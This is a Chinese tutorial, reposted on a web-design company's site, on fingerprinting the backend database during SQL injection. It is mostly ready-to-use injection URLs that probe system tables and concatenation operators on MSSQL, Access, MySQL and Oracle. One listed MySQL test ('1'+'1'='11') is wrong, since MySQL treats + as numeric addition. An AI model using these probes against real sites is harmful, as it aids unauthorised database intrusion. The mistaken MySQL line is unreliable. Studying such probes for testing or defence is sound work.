sql注入过程中后台数据库类型的三种判断方式

后台数据库类型判断:

创新互联从2013年成立,先为开原等服务建站,开原等地企业,进行企业商务咨询服务。为开原企业网站制作PC+手机+微官网三网同步一站式服务解决您的所有建站问题。

一、通过页面返回的报错信息,一般情况下页面报错会显示是什么数据库类型,在此不多说;

二、通过各个数据库特有的数据表来判断:

    1、mssql数据库

      http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=1

    2、access数据库

      http://127.0.0.1/test.php?id=1 and (select count(*) from msysobjects)>0 and 1=1

    3、MySQL数据库(mysql版本在5.0以上)

      http://127.0.0.1/test.php?id=1 and (select count(*) from information_schema.TABLES)>0 and 1=1

    4、oracle数据库

      http://127.0.0.1/test.php?id=1 and (select count(*) from sys.user_tables)>0 and 1=1

三、通过各数据库特有的连接符判断数据库类型:

    1、mssql数据库

     http://127.0.0.1/test.php?id=1 and '1' + '1' = '11'

    2、mysql数据库

     http://127.0.0.1/test.php?id=1 and '1' + '1' = '11'

     http://127.0.0.1/test.php?id=1 and CONCAT('1','1')='11'

    3、oracle数据库

     http://127.0.0.1/test.php?id=1 and '1'||'1'='11'

     http://127.0.0.1/test.php?id=1 and CONCAT('1','1')='11'


网站题目:sql注入过程中后台数据库类型的三种判断方式
标题来源:http://bzwzjz.com/article/pijgji.html

其他资讯

Copyright © 2007-2020 广东宝晨空调科技有限公司 All Rights Reserved 粤ICP备2022107769号
友情链接: 成都网站设计 高端网站设计 外贸营销网站建设 专业网站设计 网站设计 响应式网站设计 网站建设费用 成都品牌网站设计 成都网站制作 响应式网站设计 重庆手机网站建设 温江网站设计 做网站设计 成都网站建设公司 网站建设 重庆网站建设 响应式网站建设 成都营销网站建设 成都网站设计 成都网站建设 成都网站建设 网站制作公司